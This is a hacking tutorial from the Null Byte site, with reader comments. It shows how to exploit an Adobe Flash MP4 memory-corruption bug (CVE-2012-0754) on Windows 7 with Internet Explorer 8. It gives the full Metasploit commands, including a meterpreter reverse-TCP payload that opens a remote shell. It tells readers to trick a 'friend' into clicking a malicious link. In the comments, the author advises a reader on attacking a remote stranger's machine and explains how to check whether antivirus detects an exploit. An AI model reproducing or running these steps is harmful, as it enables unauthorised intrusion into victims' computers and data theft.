Hack Like a Pro: How to Exploit Adobe Flash with a Corrupted Movie File to Hack Windows 7

How to Exploit Adobe Flash with a Corrupted Movie File to Hack Windows 7

Hack Like a Pro: How to Exploit Adobe Flash with a Corrupted Movie File to Hack Windows 7

Welcome back, my greenhorn hackers!

In my continuing effort to demonstrate to you how to hack the ubiquitous Windows 7, we will going after that notoriously vulnerable Adobe Flash that is on nearly every client Windows system (you are not likely to find it on servers).

Flash and the other Adobe products have had a reputation for shoddy and insecure design for quite awhile now. The problem is so bad, that Apple will not allow Flash on its iOS operating system, angering many users, but keeping iOS more secure and energy efficient (when Flash crashes, it sucks up energy from the battery—and it crashes often, as we all know too well).

In an earlier tutorial, I showed you how to find vulnerabilities by using the SecurityFocus database. Let's go there again and take a look at the Adobe Flash vulnerabilities.

Step 1: Search Vulnerabilities

When we go to www.securityfocus.com and search the database for Adobe and then Flash Player, we get 8 pages of vulnerabilities with 20 vulnerabilities per page. Its obvious from this listing that Flash is riven with security problems. We could could spend weeks going through all the Adobe Flash Player vulnerabilities , but I'll leave that for you to do.

If you are looking to attack a client machine on a network, you would be well-served to spend your time focused on Adobe Flash. There are so many vulnerabilities and new ones arrive daily!

Step 2: Pick One

Let's take a look at one vulnerability known as CVE-2012-0754, a remote memory corruption. It was found in the wild back in February 2012 and involves using a corrupted .mp4 file to create a buffer overflow in Flash that enables the attacker to execute their own code. Note that it works for Adobe Flash Player through 11.1.

When we click on the "exploit" tab at the top of the page, it takes us to a link to the exploit. We can then download or copy and paste that exploit for use.

Step 3: Use Metasploit

Let's open Metasploit and find the exploits built to take advantage of the Adobe Flash Player vulnerabilities. Search for "flash" using the following command.

  • msf > search flash

When I do so, I find numerous flash exploits, but I have highlighted the one we are using here and it corresponds to CVE-2012-0754. Now let's use it.

  • msf > use exploit/windows/browser/adobe_flash_mp4_cprt

When we do that, it will load the exploit into the console. Now let's get more info on it.

  • msf > info

Metasploit returns for us some basic info on the exploit. I have highlighted the description in the screenshot above. In this info, we can also see that this exploit has 'targets". To get the most reliable results, you want to set the target.

In our case here, we are going after Windows 7 with IE8 (remember, IE8 came as default on Windows 7 and is still the most widely used browser with 21.2% of the market), so we set the target to 6.

  • msf > set target 6

Step 4: Set Options

Next we need to set our options. We can see the options by typing:

  • msf > show options

We need to set the SVRHOST and the payload at a minimum. We could also set the SVRPORT, the URIPATH, and the SSL settings, but we will leave these at their defaults here.

  • msf > set SVRHOST 192.168.1.104
  • msf > set payload windows/meterpreter/reverse_tcp

Once we set the payload, we once again need to check options as payloads have their own set of options. When we do so, we see that we need to set the LHOST (the IP of our local host) for the meterpreter.

  • msf > set LHOST 192.168.1.104

Step 5: Exploit!

With all the parameters we need set, all we need to do type:

  • msf> exploit

This will now generate a corrupted .mp4 file and will host it on the Metasploit web server. Now we need to be creative and send that link to the victim and hope they click on it. For instance, you could send it to a "friend" saying "Hey, check out this great new hack I found on Null Byte!"

When they click on it, Metasploit will send the .mp4 file to their browser creating a buffer overflow as seen below.

With a bit of luck (this exploit doesn't work 100% of the time, more like 50%), you will be rewarded with the meterpreter prompt and you will own his or her system!

Hacking into modern operating systems is becoming more and more difficult as Microsoft and other software vendors become more security focused. The vigilant hacker can ALWAYS find a way in, if they are persistent and creative.

Sources such as SecurityFocus and other vulnerability databases (even Microsoft's own) are constantly logging vulnerabilities and the effective hacker simply needs to stay one step ahead of the software vendors.

27 Comments

Great post, phew finally, I have read and practiced each of your tutorials not counting the ones listed as "other" and must say that I am impressed. I have a few questions if you have the time,

I have been using ubuntu and have dled each of the hack as needed, which has been a great learning exp for me as this has caused me to have to lean some linux at the same time to get them to actually run.

I would highly recommend this to other noobs rather than just using backtrack.

But i will be installing Kali and am going to do it on a small partition as it will make it quicker and easier to wipe my drive as needed (cover my deleted tracks.) Is this advisable? or would you recommend a flash drive even though you cant get update?

The exploits that are new for new vulnerability's should those still be recompiled to escape virus detection? Or are they "safe" meaning the signatures have not been updated yet?

Thanking you in advance
a hopefully improving noob

Jon:

Welcome to Null Byte! I'm glad you are finding these tutorials helpful.

I advise installing Kali or BackTrack either as a dual boot or in a VM. Any exploit that has been around more than a few months will have a signature in the AV database. The AV people do their job.

As for checking the whether a signature exists, simply run the exploit against your AV and see if it detects it. That should be a good test, unless you have really poor AV. Most of the AV software publishers use the same signatures.

OTW

deleted

oops sorry never mind. Started looking through the "everything else" sections. My questions will probably be answered there. I think I will just go to the forum and start with the first thread there and work my way forward. I notice the forum has all the articles listed with the extra forum threads so should be a gold mine of information. I will post again once i work through all the threads and practices listed there. :)

Thanks again .

How do i hack a windows 98/windowsxp machine that is not in my lan and lives in another state plus i have the ip but i dont want him to open a application or goto a website so how would i hack hi? BTW i can make him goto a website that allows me to get into his pc but prefer not to.

Qadeem:

Those OS's are easy to hack. Have you read my XP tutorial or any of those using ms08-067? The victim only needs to be online.

OTW

oo can u give me a link or tell me have you made a How To yet?

Yes, just put the info in the search window

I just started Network security degree and I tested this exploit . But the person who I had click on my generated link was not able to connect to it. I am sure it is some thing simple that I am just over looking but could someone please help me out?

Hi OTW,

Im a real noob but I managed to install kali on my laptop, I've tested several exploits on my laptop(Hp, windows 7), actually none of the exploits you have explained worked :/. We're on the same LAN and I do see his connection on my terminal but it always freezes/stops after the first steps. the furthest i got was "Sending ADP(or something like that) to client" using a silverlight exploit(http://www.scip.ch/en/?vuldb.12529) could you please do some suggestions?

Bart (Im sorry for my bad english)

Bart:

It's hard to diagnose what might be wrong with so little info. First, are you sure that the target machine has the vulnerability you are trying to exploit?

OTW

Yes, im sure it has the vulnerability's which I tested.

Bart

Bart, your certainty is worrisome. Have you done the proper recon?

Let's work with one hack at at time and see what is happening.

Hi OTW,

Because youre windows 7 are still to advanced for me, I'm trying to pown a windows xp virtual machine(windows xp professional,SP3, windows firewall off,no updates, wifi set to bridged mode). I'm using your guide (using the RPC DCOM,MS03-026). My metasploit just gets stuck on 'Sending exploit ...','Because my explanations are always very confusing i've made a imgur album with screenshots:[removed],I would love if you could give me some suggestions.

Bart

Bart:

I do not click on links sent to me from people I don't know and shouldn't either. That is one of the easiest way to hack someone's computer.

Please, instead, post your screenshots here in this forum, so that other's can learn and help.

OTW

Sure, here they are:

I think it maybe has something to do with my router. Should I port forward certain port's?

Bart:

You did a great job here! Looks like you did everything right. It might be that the Windows XP you are using has been patched. Can you get an earlier version of XP?

OTW

Well I tried Service pack 2, but I got the exact same results as before..., I searched google for this bug (MS03-026), and I got the the microsoft page, there it says every version of windows xp is vulnerable,I'm downloading windows xp with no service pack's, but it's pretty slow. I'll keep you up to date.

Bart

(PS:I made some new screenshot's when I tested SP2)

I cant find any changes though :(.

Succes!,

I finally did it!, I didn't used your exploit, but I used the 'Aurora' bug, I know it's way outdated (Only effects IE 6) but I just wanted to test if I even could get a meterpreter session. Now I'm going to ''level up'' by finding exploits for updated IE's and other exploits! My succes:

It was awesome!

Bart

Congraulations Bart! I'm proud of you and your persistence. You have the makings of a hacker ;-)

every time i exploit, i get "Handler failed to bind to **** Started reverse handler on 0.0.0.0.444"
what happened?

OTW

great tutorial but I would to know something, the link im supposed to send is it this : "using URL: HTTP: //0.0.0.0:8080/****" ? as I can see on your screenshot ?

OTW

SUCCCCCEEEESSSSS finally I did it thx again it was other one but I have a question so far this tutorial only works with IE8 right ? because I tried on IE 11 so microsoft security essentials lock website but I can see on my computer when the server started after lock at this moment {} ***(ip address) adobeflashmp4cprt- sending HTML

Yes, this only works with IE8 and earlier.

i stuck at the send process. any info why it happened?

Man, now you cleared my thoughts. I can't thank you more!

Share Your Thoughts

  • Hot
  • Latest